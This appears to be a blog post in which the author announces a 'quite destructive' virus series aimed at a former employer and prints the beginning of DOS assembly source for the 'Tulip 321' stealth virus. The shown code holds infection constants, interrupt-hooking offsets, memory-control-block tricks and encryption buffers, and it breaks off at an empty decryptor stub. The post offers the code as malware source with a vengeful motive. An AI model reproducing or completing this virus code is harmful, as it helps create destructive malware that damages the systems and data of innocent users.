Hot Potatoes for Jewhaters

This is the start of the last one in a series of quite destructive viruses connected with my last employer of antisemite infamy. This is just the start, we’re not interested in actually spreading the code to the winds.

It targets Vsafe, Lotus and so on.

;==========================================================================
; ASSEMBLY OF THE TULIP 321 1.15 STEALTH VIRUS, LENGTH 2636 BYTES
;==========================================================================

.MODEL SMALL
.RADIX 16
.STACK 100H

CODE SEGMENT BYTE
ASSUME CS:CODE,DS:CODE,ES:CODE,SS:CODE
ORG 100H

INCLUDE STRUCT.ASM

;————————————————————————–
; DEFINITIONS OF MEMORY WORKSPACE AND CONSTANTS
;————————————————————————–

;Constants
Files_To_Infect EQU 5H ;Amount of files to infect at one DIR
CodeSize EQU EoC-SoC ;Amount of program code
CodeSize_Paras EQU CodeSize/10H ;Amount of program code in paragraphs
MemReq EQU CodeSize_Paras+DataArea.StackTop/10

;Space required in paragraphs
MemReq_w_MCB EQU MemReq+1 ;Space required including MCB
DosOwned EQU WORD PTR 08H ;MCBOwner =08->Owned by DOS
MiddleBlock EQU BYTE PTR ‘M’ ;ChainFlag=M ->Not last block
LastBlock EQU BYTE PTR ‘Z’ ;ChainFlag=Z ->Last block
VirusSign EQU ‘Tu’ ;Signature of virus

;Absolute references inside code
AbsDOSVersion EQU DOSVersion – SoC
AbsBootCnt EQU BootCnt – SoC

AbsInt03Handler EQU Int03Handler – SoC
AbsInt21Handler EQU Int21Handler – SoC
AbsInt24Handler EQU Int24Handler – SoC
AbsInt2BHandler EQU Int2BHandler – SoC
AbsInt2FHandler EQU Int2FHandler – SoC

AbsRequestReturn EQU RequestReturn – SoC
AbsBackToDOS EQU BackToDOS – SoC
AbsEncryptedArea EQU EncryptedArea – SoC
AbsGarbageDOSCalls EQU GarbageDOSCalls – SoC
AbsGarbageInstructions EQU GarbageInstructions – SoC
AbsMathFunc EQU MathFunc – SoC

DataArea EQU SavedStart – SoC
OfsFromEOF EQU CodeSize – DataArea
LWholeCode EQU (BootCnt – EncryptedArea)/2

;————————————————————————–
; DEFINITIONS OF STRUCTURES
;————————————————————————–

SavedIntList_Struc STRUC
Int03 DW 2 DUP (?)
Int13 DW 2 DUP (?)
Int21 DW 2 DUP (?)
Int24 DW 2 DUP (?)
Int2F DW 2 DUP (?)
SavedIntList_Struc ENDS

NameBuffer_Struc STRUC
BufferIndex DW ?
NameBuffer DW 100 DUP (?)
NameBuffer_Struc ENDS

Work_Data_Area STRUC
EXEHeader EXE_Header
SavedSP DW ?
SavedSS DW ?
SavedAttribute DB ?
Relocation_Flag DB ?
SavedAX DW ?
SavedDX DW ?
HandlerStart DW ?
EncryptionKey DW ?
CntReg DB ?
PosReg DB ?
KeyReg DB ?
ProgIP DW ?
SaveSeg DW ?
DOS_Seg DW ?
DOSSize DW ?
RetAddr DW ?
DPL Dos_Parameter_List
SavedIntList SavedIntList_Struc
EncryptArea DB 0A60h DUP (?)
FCBBuff DB 80h DUP (?)
NameBuff NameBuffer_Struc
StackBottom DB 200h DUP (?)
StackTop DB 0FFh

WORK_DATA_AREA ENDS

;————————————————————————–

JMPF MACRO SEG,OFS
DB 0EAH
DW OFS
DW SEG
ENDM

StartProg :
JMP SoC
MOV AH,4C
INT 21
;————————————————————————–
; AREA OF DECRYPTOR
;————————————————————————–
SoC:
DB 58h DUP (90)

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: